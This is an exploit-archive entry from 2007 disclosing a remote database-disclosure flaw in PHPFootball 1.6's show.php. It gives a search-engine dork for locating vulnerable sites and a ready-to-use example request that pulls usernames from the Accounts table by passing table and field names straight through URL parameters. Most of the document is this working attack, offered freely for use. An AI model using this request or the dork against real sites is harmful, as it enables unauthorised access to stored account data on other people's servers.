id: 1445
date: 01/30/2007
title: PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
author: ajann
cves: 

===================================================================
PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
===================================================================



*******************************************************************************
# Title   :  PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free
# Dork    :  inurl:/phpfootball/

*******************************************************************************

[[DBREAD]]]---------------------------------------------------------

http://[target]/[path]//show.php [VARIABLES]

Example:

//show.php?dbtable=Accounts&dbfield=Username&dbfieldv=%&dbfields=Id&

[dbtable] :Database Table Name
[dbfield] :Field Name
[dbfields]:Listing(Order by x)

[[/DBREAD]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-22]  #